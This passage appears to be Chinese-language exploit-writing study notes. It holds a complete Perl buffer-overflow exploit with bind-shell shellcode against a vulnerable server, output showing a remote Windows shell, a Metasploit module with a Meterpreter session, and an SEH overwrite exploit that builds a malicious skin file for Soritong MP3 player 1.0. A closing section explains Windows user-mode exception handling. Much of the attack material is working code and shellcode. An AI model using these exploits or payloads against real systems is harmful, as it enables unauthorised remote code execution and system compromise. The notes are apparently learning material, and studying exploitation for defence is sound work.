    "\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
    "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
    "\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
    "\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72"
    "\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66"
    "\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14"
    "\x8E\x03\xD3\x52\x33\xFF\x57\x68\x61\x72"
    "\x79\x41\x68\x4C\x69\x62\x72\x68\x4C\x6F"
    "\x61\x64\x54\x53\xFF\xD2\x68\x33\x32\x01"
    "\x01\x66\x89\x7C\x24\x02\x68\x75\x73\x65"
    "\x72\x54\xFF\xD0\x68\x6F\x78\x41\x01\x8B"
    "\xDF\x88\x5C\x24\x03\x68\x61\x67\x65\x42"
    "\x68\x4D\x65\x73\x73\x54\x50\xFF\x54\x24"
    "\x2C\x57\x68\x4F\x5F\x6F\x21\x8B\xDC\x57"
    "\x53\x53\x57\xFF\xD0\x68\x65\x73\x73\x01"
    "\x8B\xDF\x88\x5C\x24\x03\x68\x50\x72\x6F"
    "\x63\x68\x45\x78\x69\x74\x54\xFF\x74\x24"
    "\x40\xFF\x54\x24\x40\x57\xFF\xD0")
data+=shellcode
s= socket.socket()
s.connect(('localhost',200))
s.send(data)
s.close()

运行成功：

我们再使用一个绑定端口的的payload，下面的payload将shell绑定到tcp 5555端口：

#
print " --------------------------------------\n";
print "     Writing Buffer Overflows\n";
print "       Peter Van Eeckhoutte\n";
print "     http://www.corelan.be:8800\n";
print " --------------------------------------\n";
print "    Exploit for vulnserver.c\n";
print " --------------------------------------\n";
use strict;
use Socket;
my $junk = "\x90" x 504;

#jmp esp (from ws2_32.dll)
my $eipoverwrite = pack('V',0x71a22b53);

#add some NOP's
my $shellcode="\x90" x 50;

# windows/shell_bind_tcp - 702 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, LPORT=5555, RHOST=
$shellcode=$shellcode."\x89\xe0\xd9\xd0\xd9\x70\xf4\x59\x49\x49\x49\x49\x49\x43" .
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58" .
"\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42" .
"\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30" .
"\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x42\x4a" .
"\x4a\x4b\x50\x4d\x4d\x38\x4c\x39\x4b\x4f\x4b\x4f\x4b\x4f" .
"\x45\x30\x4c\x4b\x42\x4c\x51\x34\x51\x34\x4c\x4b\x47\x35" .
"\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x44\x38\x45\x51\x4a\x4f" .
"\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x47\x50\x43\x31" .
"\x4a\x4b\x47\x39\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e" .
"\x50\x31\x49\x50\x4a\x39\x4e\x4c\x4c\x44\x49\x50\x42\x54" .
"\x45\x57\x49\x51\x48\x4a\x44\x4d\x45\x51\x48\x42\x4a\x4b" .
"\x4c\x34\x47\x4b\x46\x34\x46\x44\x51\x38\x42\x55\x4a\x45" .
"\x4c\x4b\x51\x4f\x51\x34\x43\x31\x4a\x4b\x43\x56\x4c\x4b" .
"\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b" .
"\x44\x43\x46\x4c\x4c\x4b\x4b\x39\x42\x4c\x51\x34\x45\x4c" .
"\x45\x31\x49\x53\x46\x51\x49\x4b\x43\x54\x4c\x4b\x51\x53" .
"\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c" .
"\x4e\x4d\x4c\x4b\x51\x50\x44\x48\x51\x4e\x43\x58\x4c\x4e" .
"\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f\x4e\x36\x45\x36" .
"\x51\x43\x42\x46\x43\x58\x46\x53\x47\x42\x45\x38\x43\x47" .
"\x44\x33\x46\x52\x51\x4f\x46\x34\x4b\x4f\x48\x50\x42\x48" .
"\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x48\x56" .
"\x51\x4f\x4c\x49\x4d\x35\x43\x56\x4b\x31\x4a\x4d\x45\x58" .
"\x44\x42\x46\x35\x43\x5a\x43\x32\x4b\x4f\x4e\x30\x45\x38" .
"\x48\x59\x45\x59\x4a\x55\x4e\x4d\x51\x47\x4b\x4f\x48\x56" .
"\x51\x43\x50\x53\x50\x53\x46\x33\x46\x33\x51\x53\x50\x53" .
"\x47\x33\x46\x33\x4b\x4f\x4e\x30\x42\x46\x42\x48\x42\x35" .
"\x4e\x53\x45\x36\x50\x53\x4b\x39\x4b\x51\x4c\x55\x43\x58" .
"\x4e\x44\x45\x4a\x44\x30\x49\x57\x46\x37\x4b\x4f\x4e\x36" .
"\x42\x4a\x44\x50\x50\x51\x50\x55\x4b\x4f\x48\x50\x45\x38" .
"\x49\x34\x4e\x4d\x46\x4e\x4a\x49\x50\x57\x4b\x4f\x49\x46" .
"\x46\x33\x50\x55\x4b\x4f\x4e\x30\x42\x48\x4d\x35\x51\x59" .
"\x4c\x46\x51\x59\x51\x47\x4b\x4f\x49\x46\x46\x30\x50\x54" .
"\x46\x34\x50\x55\x4b\x4f\x48\x50\x4a\x33\x43\x58\x4b\x57" .
"\x43\x49\x48\x46\x44\x39\x51\x47\x4b\x4f\x4e\x36\x46\x35" .
"\x4b\x4f\x48\x50\x43\x56\x43\x5a\x45\x34\x42\x46\x45\x38" .
"\x43\x53\x42\x4d\x4b\x39\x4a\x45\x42\x4a\x50\x50\x50\x59" .
"\x47\x59\x48\x4c\x4b\x39\x4d\x37\x42\x4a\x47\x34\x4c\x49" .
"\x4b\x52\x46\x51\x49\x50\x4b\x43\x4e\x4a\x4b\x4e\x47\x32" .
"\x46\x4d\x4b\x4e\x50\x42\x46\x4c\x4d\x43\x4c\x4d\x42\x5a" .
"\x46\x58\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x43\x42\x4b\x4e" .
"\x48\x33\x42\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x48\x56" .
"\x51\x4b\x46\x37\x50\x52\x50\x51\x50\x51\x50\x51\x43\x5a" .
"\x45\x51\x46\x31\x50\x51\x51\x45\x50\x51\x4b\x4f\x4e\x30" .
"\x43\x58\x4e\x4d\x49\x49\x44\x45\x48\x4e\x46\x33\x4b\x4f" .
"\x48\x56\x43\x5a\x4b\x4f\x4b\x4f\x50\x37\x4b\x4f\x4e\x30" .
"\x4c\x4b\x51\x47\x4b\x4c\x4b\x33\x49\x54\x42\x44\x4b\x4f" .
"\x48\x56\x51\x42\x4b\x4f\x48\x50\x43\x58\x4a\x50\x4c\x4a" .
"\x43\x34\x51\x4f\x50\x53\x4b\x4f\x4e\x36\x4b\x4f\x48\x50" .
"\x41\x41";

# initialize host and port
my $host = shift || '192.168.10.130';
my $port = shift || 200;

my $proto = getprotobyname('tcp');

# get the port address
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($port, $iaddr);

print "[+] Setting up socket\n";
# create the socket, connect to the port
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
print "[+] Connecting to $host on port $port\n";
connect(SOCKET, $paddr) or die "connect: $!";

print "[+] Sending payload\n";
print SOCKET $junk.$eipoverwrite.$shellcode."\n";

print "[+] Payload sent\n";
print "[+] Attempting to telnet to $host on port 5555...\n";
system("telnet $host 5555");

close SOCKET or die "close: $!";

下面是输出：

root@kali:~# perl sploit.pl 192.168.10.130 200
 --------------------------------------
     Writing Buffer Overflows
       Peter Van Eeckhoutte
     http://www.corelan.be:8800
 --------------------------------------
    Exploit for vulnserver.c
 --------------------------------------
[+] Setting up socket
[+] Connecting to 192.168.10.130 on port 200
[+] Sending payload
[+] Payload sent
[+] Attempting to telnet to 192.168.10.130 on port 5555...
Trying 192.168.10.130...
Connected to 192.168.10.130.
Escape character is '^]'.
Microsoft Windows XP [�汾 5.1.2600]
(C) ��Ȩ���� 1985-2001 Microsoft Corp.

D:\Program Files\Microsoft Visual Studio\MyProjects\server\Debug>dir
dir
 ������ D �еľ�û�б�ǩ��
 �������к��� 0EAA-0461

 D:\Program Files\Microsoft Visual Studio\MyProjects\server\Debug ��Ŀ¼

2014-04-07  17:22    <DIR>          .
2014-04-07  17:22    <DIR>          ..
2014-04-07  16:56           172,124 server.exe
2014-04-07  16:56           185,136 server.ilk
2014-04-07  16:56            25,594 server.obj
2014-04-07  17:22            43,520 server.opt
2014-04-07  16:56           203,728 server.pch
2014-04-07  16:56           353,280 server.pdb
2014-04-07  16:56             2,203 StdAfx.obj
2014-04-07  17:23            91,136 vc60.idb
2014-04-07  16:56           135,168 vc60.pdb
               9 ���ļ�      1,211,889 �ֽ
               2 ��Ŀ¼ 16,896,925,696 �����ֽ

成功得到了存在漏洞服务器的shell。

将exploit转换成metasploit，现在先贴代码，以后有时间仔细研究这个的写法。

#
#
# Custom metasploit exploit for vulnserver.c
# Written by Peter Van Eeckhoutte
#
#
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

      include Msf::Exploit::Remote::Tcp

      def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'Custom vulnerable server stack overflow',
                        'Description'    => %q{
                                        This module exploits a stack overflow in a 
                                        custom vulnerable server.
                                             },
                        'Author'         => [ 'Terenceli ' ],
                        'Version'        => '$Revision: 9999 $',
                        'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'process',
                                },
                        'Payload'        =>
                                {
                                        'Space'    => 1400,
                                        'BadChars' => "\x00\xff",
                                },
                        'Platform'       => 'win',

                        'Targets'        =>
                                [
                                        ['Windows XP SP3 CHS',
                                          { 'Ret' => 0x71a22b53, 'Offset' => 504 } ],
                                        ['Windows 2003 Server R2 SP2',
                                          { 'Ret' => 0x71c02b67, 'Offset' => 504  } ],
                                ],
                        'DefaultTarget' => 0,

                        'Privileged'     => false
                        ))

                        register_options(
                        [
                                Opt::RPORT(200)
                        ], self.class)
       end

       def exploit
          connect

          junk = make_nops(target['Offset'])
          sploit = junk + [target.ret].pack('V') + make_nops(50) + payload.encoded
          sock.put(sploit)

          handler
          disconnect

       end

end

在xpsp3上的测试：

msf exploit(server) > set RHOST 192.168.10.130
RHOST => 192.168.10.130
msf exploit(server) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(server) > exploit

[*] Started bind handler
[*] Sending stage (769024 bytes) to 192.168.10.130
[*] Meterpreter session 2 opened (192.168.10.129:50459 -> 192.168.10.130:4444) at 2014-04-07 20:46:05 +0800

meterpreter > sysinfo
Computer        : CHINA-CE09C2DA6
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : zh_CN
Meterpreter     : x86/win32

exploit编写笔记2——基于SEH的exploit

2014-04-07T00:00:00+00:00

这是exploit编写的第二篇笔记，基于SEH的exploit。SEH的原理在之前的文章中已经做了详细说明，这里不再赘述。这次的例子是Soritong MP3 player 1.0上的漏洞，程序下载：soritong10.exe。

这个漏洞指出一个畸形皮肤文件将导致溢出，我们用python创建一个ui.txt文件并放到skin\default文件夹下面：

file = "ui.txt"
junk = "A" * 5000
f = open(file,'w')
f.write(junk)
f.close()

打开soritong mp3，可以看到无声崩溃掉，使用windbg查看seh的prev和handler都被我们的’A’覆盖了。

当异常发生时，程序会跳转到SEH handler去执行，通过将这个handler的值设置为程序自带模块的一个pop/pop/ret地址，能够实现程序跳转到next seh pointer去，在next seh中需要做的就是跳转到shellcode执行。corelan的教程说的是造成一个二次异常，我觉得不是，就是简单的ret将next seh的值弹到了eip而已。shellcode的布局大致如下：

[junk][next seh][seh][shellcode]

next seh是一个跳转到shellcode的指令，seh是一个程序自带模块的p/p/r地址。

通过mona的pattern可以找到需要seh需要覆盖的偏移为588。一个short jmp机器码是eb，跟上跳转距离，跳过6字节的short jmp机器码为eb 06。所以使用0xeb,0x06,0x90,0x90覆盖 next seh。

查找pop pop ret指令

也就是说se handler在588个字节后被覆盖，next seh就在584个字节后被覆盖，

接着，我们找p/p/r地址

0:000> lm
start    end        module name
00400000 004de000   SoriTong C (export symbols)       C:\Program Files\SoriTong\SoriTong.exe
010d0000 0111f000   DRMClien   (deferred)             
10000000 10094000   Player     (deferred)             
42100000 42129000   wmaudsdk   (deferred)             
5adc0000 5adf7000   uxtheme    (deferred)             
5bd10000 5bd50000   strmdll    (deferred)             
5d170000 5d20a000   COMCTL32   (deferred)             
62c20000 62c29000   LPK        (deferred)


0:000> s 10000000 10094000 5f 5e c3
1000e0d2  5f 5e c3 8b 47 78 85 c0-75 05 33 c0 5f 5e c3 8b  _^..Gx..u.3._^..
1000e0de  5f 5e c3 8b 07 8b cf ff-10 8b f0 85 f6 7c 07 8b  _^...........|..
1000e0f6  5f 5e c3 cc cc cc cc cc-cc cc 53 56 57 8b f1 55  _^........SVW..U
100106fb  5f 5e c3 cc cc 8b 44 24-08 8b 54 24 04 50 8b 49  _^....D$..T$.P.I
10010cab  5f 5e c3 cc cc 41 e8 6a-fe ff ff a8 01 74 05 d1  _^...A.j.....t..
100116fd  5f 5e c3 56 8b f1 8d 89-1c 8a 04 00 e8 82 74 ff  _^.V..........t.
1001263d  5f 5e c3 55 8b ec 57 56-8b 75 0c 8b 7d 08 8b 4d  _^.U..WV.u..}..M
100127f8  5f 5e c3 cc cc cc cc cc-8b 44 24 04 56 57 8b d0  _^.......D$.VW..
1001281f  5f 5e c3 cc cc cc cc cc-cc cc cc cc cc cc cc cc  _^..............
10012984  5f 5e c3 cc cc cc cc cc-cc cc cc cc 8b 44 24 04  _^...........D$.
...

我们随便选一个如10012984.

这里再解释一下pop pop ret指令的作用，当异常发生的时候，异常分发器创建自己的栈帧，会奖EH handler成员压入新创的栈帧中，在EH结构中有一个域是EstablisherFrame。这个域指向异常注册记录(next seh)的地址并被压入栈中，当一个函数被调用的时候被压入的这个值都是位于ESP+8的地方。使用pop pop ret后，就会将next seh的地址放到EIP中。

最终的shellcode就是

junk:584字节 ‘A’

next seh:”\xeb\x06\x90\x90”

seh:”\x84\x29\x01\x10”

shellcode：完成功能的，随便找了一个弹计算器的

并且在最后加了一些垃圾数据

name = "ui.txt"
data = "A" * 584
nextseh = "\xeb\x06\x90\x90"
seh = "\xe8\x8d\x01\x10"
shellcode = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x58\x4e\x37"
"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x48"
"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48"
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c"
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48"
"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54"
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x48"
"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x43"
"\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x57"
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a"
"\x4b\x58\x4a\x56\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b"
"\x42\x50\x42\x30\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53"
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
"\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x49"
"\x50\x4f\x4c\x58\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x46"
"\x4e\x36\x43\x46\x42\x50\x5a")
junk2="\x90" * 1000;
data = data + nextseh + seh + shellcode + junk2
f = open(name,'w')
f.write(data)
f.close()

将ui.txt文件放在skin/default里面，再点击原程序，发现弹出了计算器。

Windows用户态异常处理

2014-03-31T00:00:00+00:00

Windows异常的分发
OS提供的SEH机制
编译器层面的SEH
展开

已经有太多的文章对Windows异常处理进行了讨论，我这里也是在前人的基础上总结一下，自己做个记录。为了便于理解，我准备从异常发生的那一刻到执行我们自己定义的异常处理函数进行一个梳理。

一. Windows异常的分发

在保护模式下，当有中断或异常发生时，CPU是通过IDT进入内核来寻找处理函数的，比如我们在执行一个除0操作，就会使得CPU的执行转到IDT第一项所注册的地址(nt!KiTrap00)。或者我们试图访问一个不存在的内存页会使流程转到nt!KiTrap0E。使用windbg查看idt，如下：

kd> !idt -a

Dumping IDT: 8003f400

9d120e4800000000:	804e0360 nt!KiTrap00
9d120e4800000001:	804e04db nt!KiTrap01
9d120e4800000002:	Task Selector = 0x0058
9d120e4800000003:	804e08ad nt!KiTrap03
9d120e4800000004:	804e0a30 nt!KiTrap04
9d120e4800000005:	804e0b91 nt!KiTrap05
9d120e4800000006:	804e0d12 nt!KiTrap06
9d120e4800000007:	804e137a nt!KiTrap07
9d120e4800000008:	Task Selector = 0x0050
9d120e4800000009:	804e179f nt!KiTrap09
9d120e480000000a:	804e18bc nt!KiTrap0A
9d120e480000000b:	804e19f9 nt!KiTrap0B
9d120e480000000c:	804e1c52 nt!KiTrap0C
9d120e480000000d:	804e1f48 nt!KiTrap0D

KiTrap00函数通常只是对异常作简单的表征和描述，为了支持调试和软件自己定义的异常处理函数，系统需要将异常分发给调试器或应用程序的处理函数。对于软件异常，Windows系统采用的策略是以和CPU异常统一的方式来分发和处理的，处理的关键函数是nt!KiDispatchException。

KiDispatchException原型如下：

VOID KiDispatchException(IN PEXCEPTION_RECORD 	ExceptionRecord,
						 IN PKEXCEPTION_FRAME 	ExceptionFrame,
						 IN PKTRAP_FRAME 	TrapFrame,
						 IN KPROCESSOR_MODE 	PreviousMode,
						 IN BOOLEAN 	FirstChance 
						)

ExceptionRecord用来描述异常，定义如下：

 typedef struct _EXCEPTION_RECORD {
            NTSTATUS ExceptionCode;
            ULONG ExceptionFlags;
            struct _EXCEPTION_RECORD *ExceptionRecord;
            PVOID ExceptionAddress;
            ULONG NumberParameters;
            ULONG_PTR ExceptionInformatio[EXCEPTION_MAXIMUM_PARAMETERS];
        } EXCEPTION_RECORD;

ExceptionFrame对于x86结构总是NULL，参数TrapFrame用来描述异常发生时的处理器状态，包括各种通用寄存器、调试寄存器、段寄存器等。定义如下：

 typedef struct _KTRAP_FRAME {
            ULONG   DbgEbp;         
            ULONG   DbgEip;       
            ULONG   DbgArgMark;    
            ULONG   DbgArgPointer; 
            ULONG   TempSegCs;
            ULONG   TempEsp;
            ULONG   Dr0;
            ULONG   Dr1;
            ULONG   Dr2;
            ULONG   Dr3;
            ULONG   Dr6;
            ULONG   Dr7;
            ULONG   SegGs;
            ULONG   SegEs;
            ULONG   SegDs;
            ULONG   Edx;
            ULONG   Ecx;
            ULONG   Eax;
            ULONG   PreviousPreviousMode;
            PEXCEPTION_REGISTRATION_RECORD ExceptionList;
            ULONG   SegFs;
            ULONG   Edi;
            ULONG   Esi;
            ULONG   Ebx;
            ULONG   Ebp;
            ULONG   ErrCode;
            ULONG   Eip;
            ULONG   SegCs;
            ULONG   EFlags;
            ULONG   HardwareEsp;    
            ULONG   HardwareSegSs; 
            ULONG   V86Es;          
            ULONG   V86Ds;  
            ULONG   V86Fs;
            ULONG   V86Gs;    
    } KTRAP_FRAME;

PreviousMode是一个枚举类型，表示出发异常代码的执行模式是用户模式还是内核模式。FirstChance参数表示是否是第一轮分发这个异常。对于一个异常，Windows系统会最多分发两轮。图2画出了KiDispatchException分发异常的基本过程。

这里我们只关注用户态异常并且调试器没有处理该异常的的情况。KiDispatchException将CONTEXT和EXCEPTION_RECORD结构复制到用户态栈中，之后会将内核变量KeUserExceptionDispatcher赋予KTRAP_FRAME中的eip，这个值是KiUserExceptionDispatcher函数。之后执行iret指令返回用户空间。我们在windbg中看到：

kd> dd KeUserExceptionDispatcher
8055b310  7c92e47c 7c92e460 7c92e450 0002625a
8055b320  00000000 00000000 00000000 00000000

可以看到KeUserExceptionDispatcher的值为0x7c92e47c，这与OD看到的吻合。

回到用户态后，KiUserException会通过调用RtlDispatchException来寻找异常处理器。

 KiUserExceptionDispatcher( PEXCEPTION_RECORD pExcptRec, CONTEXT *pContext )
 {
     DWORD retValue;

     // Note: If the exception is handled, RtlDispatchException() never returns
     if ( RtlDispatchException( pExceptRec, pContext ) )
         retValue = NtContinue( pContext, 0 );
     else
         retValue = NtRaiseException( pExceptRec, pContext, 0 );

     EXCEPTION_RECORD excptRec2;

     excptRec2.ExceptionCode = retValue;
     excptRec2.ExceptionFlags = EXCEPTION_NONCONTINUABLE;
     excptRec2.ExceptionRecord = pExcptRec;
     excptRec2.NumberParameters = 0;

     RtlRaiseException( &excptRec2 );
 } RtlDispatchException函数的工作就是找到注册在线程信息快(TIB)中异常处理器链表的头结点，然后依次访问每个节点，调用它的处理器函数，直到有人处理了异常，或者到了链表的末尾。这个时候SEH机制就上场了。

二. OS提供的SEH机制

RtlDispatchException调用用户层注册的异常处理函数，这个回调函数的原型如下：

EXCEPTION_DISPOSITION
__cdecl _except_handler(
struct _EXCEPTION_RECORD *ExceptionRecord,
void * EstablisherFrame,
struct _CONTEXT *ContextRecord,
void * DispatcherContext
);

这些参数中ExceptionRecord和ContextRecord是从内核态复制到用户态栈中的，EstablisherFrame是建立（登记）异常处理函数的那个函数栈帧，DispatcherContext是个指针，仅用于嵌套异常的临时保护节点有效。

typedef enum _EXCEPTION_DISPOSITION {
    ExceptionContinueExecution,
    ExceptionContinueSearch,
    ExceptionNestedException,
    ExceptionCollidedUnwind
} EXCEPTION_DISPOSITION; os会根据hander返回值来决定下一步操作。

这回快涉及到编译器的SEH支持了，我还是先来说说OS的机制，刚才说到RtlDispatchException通过TIB找到异常处理器的头节点，这是通过fs:[0]实现的，fs总是指向当前线程的TEB结构，TIB位于TEB起始处。我们先看看TIB结构：

kd> dt ntdll!_NT_TIB
   +0x000 ExceptionList    : Ptr32 _EXCEPTION_REGISTRATION_RECORD
   +0x004 StackBase        : Ptr32 Void
   +0x008 StackLimit       : Ptr32 Void
   +0x00c SubSystemTib     : Ptr32 Void
   +0x010 FiberData        : Ptr32 Void
   +0x010 Version          : Uint4B
   +0x014 ArbitraryUserPointer : Ptr32 Void
   +0x018 Self             : Ptr32 _NT_TIB

我们看到第一个结构式_EXCEPTION_REGISTRATION_RECORD

kd> dt ntdll!_EXCEPTION_REGISTRATION_RECORD
   +0x000 Next             : Ptr32 _EXCEPTION_REGISTRATION_RECORD
   +0x004 Handler          : Ptr32     _EXCEPTION_DISPOSITION 

第一部分是下一个_EXCEPTION_REGISTRATION_RECORD结构地址，第二部分是一个异常处理函数。

现在我们简单总结一下，在执行用户注册的异常处理函数的步骤是：当异常发生后，返回用户态RtlDispatchException查找用户态注册的异常处理器时，首先通过fs:[0]得到ExceptionList字段，遍历这个链表以便查找其中的一个EXCEPTION_REGISTRATION 结构，其例程回调（异常处理程序）同意处理该异常。在 MYSEH.CPP 的例子中，异常处理程序通过返回ExceptionContinueExecution 表示它同意处理这个异常。异常回调函数也可以拒绝处理这个异常。在这种情况下，系统移向链表的下一个EXCEPTION_REGISTRATION 结构并询问它的异常回调函数，看它是否愿意处理这个异常。图3显示了这个过程

我们给个例子手工编写代码来登记和注销异常处理函数。

#include "stdafx.h"

 //==================================================
 // MYSEH - Matt Pietrek 1997
 // Microsoft Systems Journal, January 1997
 // FILE: MYSEH.CPP
 // To compile: CL MYSEH.CPP
 //==================================================
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>

DWORD  scratch;

EXCEPTION_DISPOSITION
__cdecl
_except_handler(
    struct _EXCEPTION_RECORD *ExceptionRecord,
    void * EstablisherFrame,
    struct _CONTEXT *ContextRecord,
    void * DispatcherContext )
{
    unsigned i;

    // Indicate that we made it to our exception handler
    printf( "Hello from an exception handler/n" );

    // Change EAX in the context record so that it points to someplace
    // where we can successfully write
    ContextRecord->Eax = (DWORD)&scratch;

    // Tell the OS to restart the faulting instruction
    return ExceptionContinueExecution;
}

int main()
{
    DWORD handler = (DWORD)_except_handler; 
    __asm
    { 
        // 创建 EXCEPTION_REGISTRATION 结构：
        push handler 	// handler函数的地址
        push FS:[0] 	// 前一个handler函数的地址
        mov FS:[0],ESP 	// 装入新的EXECEPTION_REGISTRATION结构
    } 
    __asm
    {
        mov eax,0     	// EAX清零
        mov [eax], 1 	// 写EAX指向的内存从而故意引发一个错误
    } 
    printf( "After writing!/n" ); 
    __asm
    { 
        // 移去我们的 EXECEPTION_REGISTRATION 结构记录
        mov eax,[ESP]    	// 获取前一个结构
        mov FS:[0], EAX 	// 装入前一个结构
        add esp, 8       	// 将 EXECEPTION_REGISTRATION 弹出堆栈
    } 
    return 0; 
}

代码不必赘言，就是我们手工压入一个处理函数，然后出发一个异常，流程进入我们的处理器，处理之后继续回到原来的流程。

刚刚我们看到的就是操作系统对SEH的支持，介绍这个事为了说明登记和注销SEH处理器的基本原理。很明显，我们自己写windows程序的时候如果这样写就比较麻烦了：第一，需要自己编写符合SehHandler函数原型的处理函数；第二，要直接操作栈指针。平时我们都是直接使用__try{} __excpet()就简单的完成了异常函数的注册。这就是编译器对SEH的支持了。

三. 编译器层面的SEH

我们使用一个例子来看看编译器层面的SEH，例子程序下载：sehtes.cpp

 119:  int main()
120:  {
00401280   push        ebp
00401281   mov         ebp,esp
00401283   push        0FFh
00401285   push        offset string "Caught Exception in main\n"+24h (00422130)
0040128A   push        offset __except_handler3 (00401430)
0040128F   mov         eax,fs:[00000000]
00401295   push        eax
00401296   mov         dword ptr fs:[0],esp
0040129D   add         esp,0B4h
004012A0   push        ebx
004012A1   push        esi
004012A2   push        edi
004012A3   mov         dword ptr [ebp-18h],esp
004012A6   lea         edi,[ebp-5Ch]
004012A9   mov         ecx,11h
004012AE   mov         eax,0CCCCCCCCh
004012B3   rep stos    dword ptr [edi]
121:      int i;
122:      // 使用两个__try块（并不嵌套），这导致为scopetable数组生成两个元素
123:      __try
004012B5   mov         dword ptr [ebp-4],0
124:      {
125:          i = 0x1234;
004012BC   mov         dword ptr [ebp-1Ch],1234h
126:
127:      } __except( EXCEPTION_EXECUTE_HANDLER )
004012C3   mov         dword ptr [ebp-4],0FFFFFFFFh
004012CA   jmp         $L17074+17h (004012e9)
$L17073:
004012CC   mov         eax,1
$L17075:
004012D1   ret
$L17074:
004012D2   mov         esp,dword ptr [ebp-18h]
128:      {
129:          printf("div0 occur!\n");
004012D5   push        offset string "div0 occur!\n" (004230c4)
004012DA   call        printf (00401370)
004012DF   add         esp,4
130:      }
004012E2   mov         dword ptr [ebp-4],0FFFFFFFFh
131:      __try
004012E9   mov         dword ptr [ebp-4],1
132:      {
133:          Function1(); // 调用一个设置更多异常帧的函数
004012F0   call        @ILT+15(Function1) (00401014)
134:      } __except( EXCEPTION_EXECUTE_HANDLER )
004012F5   mov         dword ptr [ebp-4],0FFFFFFFFh
004012FC   jmp         $L17078+17h (0040131b)
$L17077:
004012FE   mov         eax,1
$L17079:
00401303   ret
$L17078:
00401304   mov         esp,dword ptr [ebp-18h]
135:      {
136:          // 应该永远不会执行到这里，因为我们并没有打算产生任何异常
137:          printf( "Caught Exception in main\n" );
00401307   push        offset string "Caught Exception in main\n" (0042210c)
0040130C   call        printf (00401370)
00401311   add         esp,4
138:      }
00401314   mov         dword ptr [ebp-4],0FFFFFFFFh
139:      return 0;
0040131B   xor         eax,eax
140:  }
0040131D   mov         ecx,dword ptr [ebp-10h]
00401320   mov         dword ptr fs:[0],ecx
00401327   pop         edi
00401328   pop         esi
00401329   pop         ebx
0040132A   add         esp,5Ch
0040132D   cmp         ebp,esp
0040132F   call        __chkesp (004013f0)
00401334   mov         esp,ebp
00401336   pop         ebp
00401337   ret


99:   void Function1( void )
100:  {
004011A0   push        ebp
004011A1   mov         ebp,esp
004011A3   push        0FFh
004011A5   push        offset string "_except_handler3 is at address: "...+30h (004220e0)
004011AA   push        offset __except_handler3 (00401430)
004011AF   mov         eax,fs:[00000000]
004011B5   push        eax
004011B6   mov         dword ptr fs:[0],esp
004011BD   add         esp,0B4h
004011C0   push        ebx
004011C1   push        esi
004011C2   push        edi
004011C3   mov         dword ptr [ebp-18h],esp
004011C6   lea         edi,[ebp-5Ch]
004011C9   mov         ecx,11h
004011CE   mov         eax,0CCCCCCCCh
004011D3   rep stos    dword ptr [edi]
101:      int i;
102:      // 嵌套3层__try块以便强制为scopetable数组产生3个元素
103:      __try
004011D5   mov         dword ptr [ebp-4],0
